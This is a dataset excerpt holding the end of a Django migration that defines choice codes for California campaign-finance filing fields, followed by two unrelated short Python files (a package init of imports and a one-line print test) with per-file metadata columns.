field=calaccess_raw.fields.CharField(blank=True, choices=[('BNM', "Ballot measure's name/title"), ('CAO', 'Candidate/officeholder'), ('CTL', 'Controlled committee'), ('COM', 'Committee'), ('com', 'Committee'), ('IND', 'Individual'), ('OFF', 'Officer'), ('OTH', 'Other'), ('PTY', 'Political Party'), ('RCP', 'Recipient committee'), ('SCC', 'Small Contributor Committee'), ('0', 'Unknown')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(end_page=9, id='2712033-Cal-Format-1-05-02', start_page=8), calaccess_raw.annotations.DocumentCloud(end_page=11, id='2712034-Cal-Format-201', start_page=9), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=41), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=54)], help_text='Entity Code describing the Contributor/Recipient', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='s497cd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F497P1', 'Form 497 (Late Contribution Report): Part 1, Contributions Received'), ('F497P2', 'Form 497 (Late Contribution Report): Part 2, Contributions Made')], db_column='FORM_TYPE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=41), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=54)], help_text='Name of the source filing form or schedule', max_length=6),
),
migrations.AlterField(
model_name='s497cd',
name='juris_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('ASM', 'Assembly District'), ('BOE', 'Board of Equalization District'), ('CIT', 'City'), ('CTY', 'County'), ('LOC', 'Local'), ('OTH', 'Other'), ('SEN', 'Senate District'), ('STW', 'Statewide'), ('asm', 'Assembly District'), ('sen', 'Senate District'), ('cit', 'City'), ('GOV', 'Statewide'), ('MAY', 'City'), ('BSU', 'County'), ('CSU', 'County'), ('SUP', 'Statewide'), ('BED', 'Other'), ('CCB', 'Other'), ('CCM', 'Other'), ('CLB', 'Other'), ('IRV', 'City'), ('Fon', 'City'), ('JRS', 'Statewide'), ('CO', 'County'), ('Riv', 'County'), ('SNE', 'Senate District'), ('83', 'Statewide'), ('PER', 'Unknown'), ('FED', 'Unknown'), ('CA', 'Unknown'), ('JR', 'Unknown')], db_column='JURIS_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=42), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=55)], help_text='Jurisdiction code describing the office being sought', max_length=3, verbose_name='jurisdiction code'),
),
migrations.AlterField(
model_name='s497cd',
name='off_s_h_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('H', 'HELD'), ('S', 'SOUGHT'), ('s', 'SOUGHT'), ('h', 'HELD'), ('F', 'UNKNOWN'), ('T', 'UNKNOWN')], db_column='OFF_S_H_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=42), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=55)], help_text='Office is sought or held code', max_length=1),
),
migrations.AlterField(
model_name='s497cd',
name='office_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('APP', 'State Appellate Court Justice'), ('ASM', 'State Assembly Person'), ('ASR', 'Assessor'), ('ATT', 'Attorney General'), ('BED', 'Board of Education'), ('BOE', 'Board of Equalization Member'), ('BSU', 'Board of Supervisors'), ('CAT', 'City Attorney'), ('CCB', 'Community College Board'), ('CCM', 'City Council Member'), ('CON', 'State Controller'), ('COU', 'County Counsel'), ('CSU', 'County Supervisor'), ('CTR', 'Local Controller'), ('DAT', 'District Attorney'), ('GOV', 'Governor'), ('INS', 'Insurance Commissioner'), ('LTG', 'Lieutenant Governor'), ('MAY', 'Mayor'), ('OTH', 'Other'), ('PDR', 'Public Defender'), ('PER', 'Public Employees Retirement System'), ('PLN', 'Planning Commissioner'), ('SCJ', 'Superior Court Judge'), ('SEN', 'State Senator'), ('SHC', 'Sheriff-Coroner'), ('SOS', 'Secretary of State'), ('SPM', 'Supreme Court Justice'), ('SUP', 'Superintendent of Public Instruction'), ('TRE', 'State Treasurer'), ('TRS', 'Local Treasurer'), ('asm', 'State Assembly Person'), ('sen', 'State Senator'), ('Asm', 'State Assembly Person'), ('May', 'Mayor'), ('ASm', 'State Assembly Person'), ('oth', 'Other'), ('csu', 'County Supervisor'), ('Oth', 'Other'), ('H', 'Unknown'), ('S', 'Unknown'), ('OF', 'Unknown'), ('HOU', 'Unknown'), ('LOC', 'Unknown'), ('LEG', 'Unknown'), ('STW', 'Unknown'), ('P', 'Unknown'), ('LTV', 'Unknown'), ('LT', 'Unknown'), ('CTY', 'Unknown'), ('OFF', 'Unknown'), ('REP', 'Unknown'), ('COM', 'Unknown'), ('N/A', 'Unknown')], db_column='OFFICE_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=10), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=12), calaccess_raw.annotations.DocumentCloud(id='2712032-Cal-Errata-201', start_page=2)], help_text='Identifies the office being sought', max_length=3, verbose_name='office code'),
),
migrations.AlterField(
model_name='s497cd',
name='sup_opp_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('O', 'OPPOSITION'), ('S', 'SUPPORT')], db_column='SUP_OPP_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=82)], help_text='Support or opposition code', max_length=1),
),
migrations.AlterField(
model_name='s498cd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('CAO', 'Candidate/officeholder'), ('COM', 'Committee'), ('IND', 'Individual'), ('OTH', 'Other'), ('RCP', 'Recipient committee')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(end_page=9, id='2712033-Cal-Format-1-05-02', start_page=8), calaccess_raw.annotations.DocumentCloud(end_page=11, id='2712034-Cal-Format-201', start_page=9), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=43), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=56)], help_text='Entity code', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='s498cd',
name='form_type',
field=calaccess_raw.fields.CharField(blank=True, choices=[('F498-A', 'Form 498 (Late Payment Report (Slate Mailer Organization)): Part A, Late Payments Attributed To'), ('F498-R', 'Form 498 (Late Payment Report (Slate Mailer Organization)): Part R, Late Payments Received From')], db_column='FORM_TYPE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=43), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=56)], help_text='Name of the source filing form or schedule', max_length=9),
),
migrations.AlterField(
model_name='s498cd',
name='juris_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('ASM', 'Assembly District'), ('BOE', 'Board of Equalization District'), ('CIT', 'City'), ('CTY', 'County'), ('LOC', 'Local'), ('OTH', 'Other'), ('SEN', 'Senate District'), ('STW', 'Statewide'), ('GOV', 'Statewide'), ('COU', 'County')], db_column='JURIS_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=43), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=57)], help_text='Office jurisdiction code', max_length=3),
),
migrations.AlterField(
model_name='s498cd',
name='off_s_h_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('H', 'HELD'), ('S', 'SOUGHT')], db_column='OFF_S_H_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=44), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=57)], help_text='Office is sought or held code', max_length=1),
),
migrations.AlterField(
model_name='s498cd',
name='office_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('APP', 'State Appellate Court Justice'), ('ASM', 'State Assembly Person'), ('ASR', 'Assessor'), ('ATT', 'Attorney General'), ('BED', 'Board of Education'), ('BOE', 'Board of Equalization Member'), ('BSU', 'Board of Supervisors'), ('CAT', 'City Attorney'), ('CCB', 'Community College Board'), ('CCM', 'City Council Member'), ('CON', 'State Controller'), ('COU', 'County Counsel'), ('CSU', 'County Supervisor'), ('CTR', 'Local Controller'), ('DAT', 'District Attorney'), ('GOV', 'Governor'), ('INS', 'Insurance Commissioner'), ('LTG', 'Lieutenant Governor'), ('MAY', 'Mayor'), ('OTH', 'Other'), ('PDR', 'Public Defender'), ('PER', 'Public Employees Retirement System'), ('PLN', 'Planning Commissioner'), ('SCJ', 'Superior Court Judge'), ('SEN', 'State Senator'), ('SHC', 'Sheriff-Coroner'), ('SOS', 'Secretary of State'), ('SPM', 'Supreme Court Justice'), ('SUP', 'Superintendent of Public Instruction'), ('TRE', 'State Treasurer'), ('TRS', 'Local Treasurer'), ('gov', 'Governor'), ('oth', 'Other')], db_column='OFFICE_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=10), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=12), calaccess_raw.annotations.DocumentCloud(id='2712032-Cal-Errata-201', start_page=2)], help_text='Identifies the office being sought', max_length=4, verbose_name='office code'),
),
migrations.AlterField(
model_name='s498cd',
name='sup_opp_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('O', 'OPPOSITION'), ('S', 'SUPPORT')], db_column='SUP_OPP_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=43), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=57)], help_text='Support or opposition code', max_length=1),
),
migrations.AlterField(
model_name='smrycd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F401', 'Form 401: Campaign Disclosure Statement (Slate Mailer Organization)'), ('F401A', 'Form 401 (Campaign Disclosure Statement (Slate Mailer Organization)): Schedule A, Payments Received'), ('F401B', 'Form 401 (Campaign Disclosure Statement (Slate Mailer Organization)): Schedule B, Payments Made'), ('F401B-1', 'Form 401 (Campaign Disclosure Statement (Slate Mailer Organization)): Schedule B-1, Payments Made by Agent or Independent Contractor'), ('F450', 'Form 450: Campaign Disclosure Statement, Short Form (Recipient Committee)'), ('F460', 'Form 460: Campaign Disclosure Statement (Recipient Committee)'), ('A', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule A, Monetary Contributions Received'), ('B1', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule B, Part 1, Loans Received'), ('B2', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule B, Part 2, Loan Guarantors'), ('B3', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule B, Part 3, Outstanding Balance'), ('C', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule C, Non-Monetary Contributions Received'), ('D', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule D, Summary of Expenditures Supporting / Opposing Other Candidates, Measures and Committees'), ('E', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule E, Payments Made'), ('F', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule F, Accrued Expenses (Unpaid Bills)'), ('G', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule G, Payments Made by an Agent or Independent Contractor (on Behalf of This Committee)'), ('H', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule H, Loans Made to Others'), ('H1', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule H, Part 1, 
Loans Made'), ('H2', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule H, Part 2, Repayments Rcvd'), ('H3', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule H, Part 3, Outstanding Loans'), ('I', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule I, Miscellanous increases to cash'), ('F461', 'Form 461: Campaign Disclosure Statement (Independent Expenditure Committee & Major Donor Committee)'), ('F465', 'Form 465: Supplemental Independent Expenditure Report'), ('F625', 'Form 625: Report of Lobbying Firm'), ('F625P2', 'Form 625 (Report of Lobbying Firm): Part 2, Payments Received in Connection with Lobbying Activity'), ('F625P3A', 'Form 625 (Report of Lobbying Firm): Part 3, Payments Made In Connection With Lobbying Activities, Section A, Activity Expenses'), ('F625P3B', 'Form 625 (Report of Lobbying Firm): Part 3, Payments Made In Connection With Lobbying Activities, Section B, Payments Made'), ('F635', 'Form 635: Report of Lobbyist Employer or Report of Lobbying Coalition'), ('F635P3A', 'Form 635 (Report of Lobbyist Employer or Report of Lobbying Coalition): Part 3, Payments Made in Connection with Lobbying Activities, Section A, Payments To In-house Employee Lobbyists'), ('F635P3B', 'Form 635 (Report of Lobbyist Employer or Report of Lobbying Coalition): Part 3, Payments Made in Connection with Lobbying Activities, Section B, Payments To Lobbying Firms'), ('F635P3C', 'Form 635 (Report of Lobbyist Employer or Report of Lobbying Coalition): Part 3, Payments Made in Connection with Lobbying Activities, Section C, Activity Expenses'), ('F635P3D', 'Form 635 (Report of Lobbyist Employer or Report of Lobbying Coalition): Part 3, Payments Made in Connection with Lobbying Activities, Section D, Other Payments to Influence Legislative or Administrative Action'), ('F635P3E', 'Form 635 (Report of Lobbyist Employer or Report of Lobbying Coalition): Part 3, Payments Made in Connection with Lobbying 
Activities, Section E, Payments in Connection with Administrative Testimony in Ratemaking Proceedings Before The California Public Utilities Commission'), ('S640', 'Schedule 640: Governmental Agencies Reporting (Attachment to Form 635 or Form 645)'), ('F645', 'Form 645: Report of Person Spending $5,000 or More'), ('F645P2A', 'Form 645 (Report of Person Spending $5,000 or More): Part 2, Payments Made this Period, Section A, Activity Expenses'), ('F645P2B', 'Form 645 (Report of Person Spending $5,000 or More): Part 2, Payments Made this Period, Section B, Other Payments to Influence Legislative or Administrative Action'), ('F645P2C', 'Form 645 (Report of Person Spending $5,000 or More): Part 2, Payments Made this Period, Section C, Payments in Connection with Administrative Testimony in Ratemaking Proceedings Before the California Public Utilities Commission'), ('F900', 'Form 900: Campaign Disclosure Statement (Public employee retirement board candidate)'), ('401A', calaccess_raw.annotations.FilingFormSection(db_value='F401A', documentcloud_id=None, end_page=7, form=calaccess_raw.annotations.FilingForm('F401', 'Campaign Disclosure Statement (Slate Mailer Organization)', description='Form 401 is filed by slate mailer organizations to disclose payments made and received in connection with producing slate mailers.', documentcloud_id='2781366-401-2005-01', group='CAMPAIGN'), id='A', start_page=5, title='Schedule A, Payments Received')), ('401B', calaccess_raw.annotations.FilingFormSection(db_value='F401B', documentcloud_id=None, end_page=9, form=calaccess_raw.annotations.FilingForm('F401', 'Campaign Disclosure Statement (Slate Mailer Organization)', description='Form 401 is filed by slate mailer organizations to disclose payments made and received in connection with producing slate mailers.', documentcloud_id='2781366-401-2005-01', group='CAMPAIGN'), id='B', start_page=8, title='Schedule B, Payments Made')), ('401B-1', 
calaccess_raw.annotations.FilingFormSection(db_value='F401B-1', documentcloud_id=None, end_page=None, form=calaccess_raw.annotations.FilingForm('F401', 'Campaign Disclosure Statement (Slate Mailer Organization)', description='Form 401 is filed by slate mailer organizations to disclose payments made and received in connection with producing slate mailers.', documentcloud_id='2781366-401-2005-01', group='CAMPAIGN'), id='B-1', start_page=10, title='Schedule B-1, Payments Made by Agent or Independent Contractor'))], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=86), calaccess_raw.annotations.DocumentCloud(end_page=28, id='2712033-Cal-Format-1-05-02', start_page=27), calaccess_raw.annotations.DocumentCloud(end_page=60, id='2712033-Cal-Format-1-05-02', start_page=59), calaccess_raw.annotations.DocumentCloud(end_page=37, id='2712034-Cal-Format-201', start_page=36), calaccess_raw.annotations.DocumentCloud(end_page=74, id='2712034-Cal-Format-201', start_page=73)], help_text='Name of the source filing form or schedule', max_length=8),
),
migrations.AlterField(
model_name='spltcd',
name='pform_type',
field=calaccess_raw.fields.CharField(choices=[('A', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule A, Monetary Contributions Received'), ('B1', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule B, Part 1, Loans Received'), ('B2', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule B, Part 2, Loan Guarantors'), ('C', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule C, Non-Monetary Contributions Received'), ('D', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule D, Summary of Expenditures Supporting / Opposing Other Candidates, Measures and Committees'), ('F450P5', 'Form 450 (Campaign Disclosure Statement, Short Form (Recipient Committee)): Part 5, Payments Made'), ('H', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule H, Loans Made to Others')], db_column='PFORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=18)], help_text='Parent Schedule Type', max_length=7),
),
migrations.AlterField(
model_name='textmemocd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F401', 'Form 401: Campaign Disclosure Statement (Slate Mailer Organization)'), ('F405', 'Form 405: Amendment to Campaign Disclosure Statement'), ('F410', 'Form 410: Statement of Organization (Recipient Committee)'), ('F425', 'Form 425: Semi-Annual Statement of No Activity (Recipient Committee)'), ('F450', 'Form 450: Campaign Disclosure Statement, Short Form (Recipient Committee)'), ('F460', 'Form 460: Campaign Disclosure Statement (Recipient Committee)'), ('F461', 'Form 461: Campaign Disclosure Statement (Independent Expenditure Committee & Major Donor Committee)'), ('F465', 'Form 465: Supplemental Independent Expenditure Report'), ('F496', 'Form 496: Late Independent Expenditure Report'), ('F497', 'Form 497: Late Contribution Report'), ('F498', 'Form 498: Late Payment Report (Slate Mailer Organization)'), ('F601', 'Form 601: Lobbying Firm Registration Statement'), ('F602', 'Form 602: Lobbying Firm Activity Authorization'), ('F603', 'Form 603: Lobbyist Employer or Lobbying Coalition Registration Statement'), ('F604', 'Form 604: Lobbyist Certification Statement'), ('F605', 'Form 605: Amendment to Registration, Lobbying Firm, Lobbyist Employer, Lobbying Coalition'), ('F606', 'Form 606: Notice of Termination'), ('F607', 'Form 607: Notice of Withdrawal'), ('F615', 'Form 615: Lobbyist Report'), ('F625', 'Form 625: Report of Lobbying Firm'), ('F635', 'Form 635: Report of Lobbyist Employer or Report of Lobbying Coalition'), ('F645', 'Form 645: Report of Person Spending $5,000 or More'), ('S630', 'Schedule 630: Payments Made to Lobbying Coalitions (Attachment to Form 625 or 635) '), ('S635-C', 'Schedule 635C: Payments Received by Lobbying Coalitions'), ('S640', 'Schedule 640: Governmental Agencies Reporting (Attachment to Form 635 or Form 645)'), ('410', 'Form 410: Statement of Organization (Recipient Committee)'), ('460', 'Form 460: Campaign Disclosure Statement (Recipient Committee)'), ('461', 'Form 461: Campaign Disclosure 
Statement (Independent Expenditure Committee & Major Donor Committee)'), ('465', 'Form 465: Supplemental Independent Expenditure Report'), ('496', 'Form 496: Late Independent Expenditure Report'), ('497', 'Form 497: Late Contribution Report'), ('497P1', 'Form 497 (Late Contribution Report): Part 1, Contributions Received'), ('497P2', 'Form 497 (Late Contribution Report): Part 2, Contributions Made'), ('F401A', 'Form 401 (Campaign Disclosure Statement (Slate Mailer Organization)): Schedule A, Payments Received'), ('F401B', 'Form 401 (Campaign Disclosure Statement (Slate Mailer Organization)): Schedule B, Payments Made'), ('F401B-1', 'Form 401 (Campaign Disclosure Statement (Slate Mailer Organization)): Schedule B-1, Payments Made by Agent or Independent Contractor'), ('F450P5', 'Form 450 (Campaign Disclosure Statement, Short Form (Recipient Committee)): Part 5, Payments Made'), ('F461P1', 'Form 461 (Campaign Disclosure Statement (Independent Expenditure Committee & Major Donor Committee)): Part 1, Name and Address of Filer'), ('F461P2', 'Form 461 (Campaign Disclosure Statement (Independent Expenditure Committee & Major Donor Committee)): Part 2, Nature and Interests of Filer'), ('F461P5', 'Form 461 (Campaign Disclosure Statement (Independent Expenditure Committee & Major Donor Committee)): Part 5, Contributions (Including Loans, Forgiveness of Loans, and LoanGuarantees) and Expenditures Made'), ('F465P3', 'Form 465 (Supplemental Independent Expenditure Report): Part 3, Independent Expenditures Made'), ('F496P3', 'Form 496 (Late Independent Expenditure Report): Part 3, Contributions > $100 Received'), ('F497P1', 'Form 497 (Late Contribution Report): Part 1, Contributions Received'), ('F497P2', 'Form 497 (Late Contribution Report): Part 2, Contributions Made'), ('F498-A', 'Form 498 (Late Payment Report (Slate Mailer Organization)): Part A, Late Payments Attributed To'), ('F498-R', 'Form 498 (Late Payment Report (Slate Mailer Organization)): Part R, Late Payments 
Received From'), ('F601P2A', 'Form 601 (Lobbying Firm Registration Statement): Part 2, Section A, Lobbyist Employers'), ('F601P2B', 'Form 601 (Lobbying Firm Registration Statement): Part 2, Section B, Subcontracted Clients'), ('F615P1', 'Form 615 (Lobbyist Report): Part 1, Activity Expenses Paid, Incurred, Arranged or Provided by the Lobbyist'), ('F615P2', 'Form 615 (Lobbyist Report): Part 2, Campaign Contributions Made or Delivered'), ('F625P2', 'Form 625 (Report of Lobbying Firm): Part 2, Payments Received in Connection with Lobbying Activity'), ('F625P3A', 'Form 625 (Report of Lobbying Firm): Part 3, Payments Made In Connection With Lobbying Activities, Section A, Activity Expenses'), ('F625P3B', 'Form 625 (Report of Lobbying Firm): Part 3, Payments Made In Connection With Lobbying Activities, Section B, Payments Made'), ('F625P4B', 'Form 625 (Report of Lobbying Firm): Part 4, Campaign Contributions Made'), ('S635', 'Form 635: Report of Lobbyist Employer or Report of Lobbying Coalition'), ('F635P3B', 'Form 635 (Report of Lobbyist Employer or Report of Lobbying Coalition): Part 3, Payments Made in Connection with Lobbying Activities, Section B, Payments To Lobbying Firms'), ('F635P3C', 'Form 635 (Report of Lobbyist Employer or Report of Lobbying Coalition): Part 3, Payments Made in Connection with Lobbying Activities, Section C, Activity Expenses'), ('F635P4B', 'Form 635 (Report of Lobbyist Employer or Report of Lobbying Coalition): Part 4, Campaign Contributions Made'), ('F645P2A', 'Form 645 (Report of Person Spending $5,000 or More): Part 2, Payments Made this Period, Section A, Activity Expenses'), ('F645P3B', 'Form 645 (Report of Person Spending $5,000 or More): Part 3, Campaign Contributions Made'), ('S497', 'Form 497: Late Contribution Report'), ('S635C', 'Schedule 635C: Payments Received by Lobbying Coalitions'), ('A', 'Schedule A of any form (e.g., Forms 401 or 460)'), ('A4', 'Schedule A of any form (e.g., Forms 401 or 460)'), ('A6', 'Schedule A of any 
form (e.g., Forms 401 or 460)'), ('B', 'Schedule B of any form (e.g., Forms 401 or 460)'), ('B1', 'Schedule B, Part 1 of Forms 401 or 460'), ('B2', 'Schedule B, Part 2 of Forms 401 or 460'), ('B3', 'Schedule B, Part 3 of Forms 401 or 460'), ('C', 'Schedule C of any form (e.g., Forms 401 or F460)'), ('COMMENTS', 'Possibly comments by FPPC for any form?'), ('CVR', 'Cover page for any form (e.g., Forms 460, 461 or 497)'), ('D', 'Schedule D of any form (e.g., Forms 401, 460 or 461)'), ('DEBTF', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule F, Accrued Expenses (Unpaid Bills)'), ('E', 'Schedule E of any form (e.g., Forms 460, 461 or 465)'), ('EXPNT', 'Expenditures outlined on any form (e.g. Form 460)'), ('F', 'Schedule F of any form (e.g., Form 460)'), ('G', 'Schedule G of any form (e.g., Form 460)'), ('H', 'Schedule H of any form (e.g., Form 460)'), ('H1', 'Schedule H, Part 1 of any form (e.g., Form 460)'), ('H2', 'Schedule H2, Part 2 of any form (e.g., Form 460)'), ('H3', 'Schedule H3, Part 3 of any form (e.g., Form 460)'), ('I', 'Schedule I of any form (e.g., Form 460)'), ('PT5', 'Part 5 of any form (e.g., Form 461'), ('RCPTB1', 'Schedule B, Part 1 of any form (e.g., Form 460'), ('RCPTC', 'Schedule C of any form (e.g., Form 460)'), ('RCPTI', 'Schedule I of any form (e.g., Form 460)'), ('SCH A', 'Schedule A of any form (e.g., Form 460)'), ('SF', 'Schedule F of any form (e.g., Form 460)'), ('SPLT', 'A memo that applies to multiple items?'), ('SMRY', 'Summary section of any form (e.g., Form 460)'), ('SUM', 'Summary section of any form (e.g., Form 460)'), ('SUMMARY', 'Summary section of any form (e.g., Form 460)')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=90), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=16), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=13)], 
help_text='Name of the source filing form or schedule', max_length=8, verbose_name='form type'),
),
]
| 225.066277 | 8,088 | 0.692428 | 14,332 | 115,459 | 5.475788 | 0.071239 | 0.053976 | 0.073854 | 0.112387 | 0.898087 | 0.881446 | 0.860205 | 0.83997 | 0.826986 | 0.798672 | 0 | 0.058708 | 0.125447 | 115,459 | 512 | 8,089 | 225.505859 | 0.718505 | 0.000589 | 0 | 0.748515 | 1 | 0.09505 | 0.522715 | 0.058403 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.007921 | 0 | 0.013861 | 0.00396 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
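The `choices` lists in the migration above pair a short database code with a human-readable label, following Django's standard `(value, label)` convention. A minimal plain-Python sketch (not part of the migration; the codes are copied from the `OFF_S_H_CD` field above, and the `display` helper is an illustrative stand-in for Django's generated `get_FOO_display()`) of how such a list becomes a lookup table:

```python
# (value, label) pairs as used by Django's `choices` option,
# copied from the OFF_S_H_CD field in the migration above.
OFF_S_H_CHOICES = [("H", "HELD"), ("S", "SOUGHT")]

# Build a code -> label lookup, the same mapping Django derives
# from `choices` for its get_FOO_display() method.
label_for = dict(OFF_S_H_CHOICES)

def display(code):
    """Return the label for a code, falling back to the raw code."""
    return label_for.get(code, code)
```

The fallback matters for this dataset: CAL-ACCESS filings contain codes outside the documented vocabulary, which is why several fields above also carry duplicate or lowercase variants such as `('gov', 'Governor')`.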
15ddfa928ce65ee15964a1b7abfe539d9c9f04bd | 406 | py | Python | synethesia/network/__init__.py | RunOrVeith/SyNEThesia | 0ef5de759b4bf74cb318fc5e6e9be64520b8faf5 | [
"MIT"
] | 19 | 2018-03-26T08:47:15.000Z | 2021-06-21T07:57:59.000Z | synethesia/network/__init__.py | RunOrVeith/SyNEThesia | 0ef5de759b4bf74cb318fc5e6e9be64520b8faf5 | [
"MIT"
] | null | null | null | synethesia/network/__init__.py | RunOrVeith/SyNEThesia | 0ef5de759b4bf74cb318fc5e6e9be64520b8faf5 | [
"MIT"
] | 3 | 2020-07-07T21:19:33.000Z | 2021-05-31T17:22:40.000Z | from synethesia.network.feature_creators import logfbank_features, fft_features
from synethesia.network.synethesia_model import SynethesiaModel
from synethesia.network.io.audio_chunk_loader import StaticSongLoader
from synethesia.network.io.live_viewer import LiveViewer, AudioRecorder
from synethesia.network.io.sampled_song import SampledSong
from synethesia.network.io.video_creator import VideoCreator
| 58 | 79 | 0.891626 | 51 | 406 | 6.921569 | 0.509804 | 0.23796 | 0.356941 | 0.260623 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064039 | 406 | 6 | 80 | 67.666667 | 0.928947 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c649f0fa3babf02428f3a67a7be4ea08f00b3293 | 23 | py | Python | test/run/t141.py | timmartin/skulpt | 2e3a3fbbaccc12baa29094a717ceec491a8a6750 | [
"MIT"
] | 2,671 | 2015-01-03T08:23:25.000Z | 2022-03-31T06:15:48.000Z | test/run/t141.py | timmartin/skulpt | 2e3a3fbbaccc12baa29094a717ceec491a8a6750 | [
"MIT"
] | 972 | 2015-01-05T08:11:00.000Z | 2022-03-29T13:47:15.000Z | test/run/t141.py | timmartin/skulpt | 2e3a3fbbaccc12baa29094a717ceec491a8a6750 | [
"MIT"
] | 845 | 2015-01-03T19:53:36.000Z | 2022-03-29T18:34:22.000Z | print 1|2|3|4|5|6|0x80
| 11.5 | 22 | 0.652174 | 8 | 23 | 1.875 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.428571 | 0.086957 | 23 | 1 | 23 | 23 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 1 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
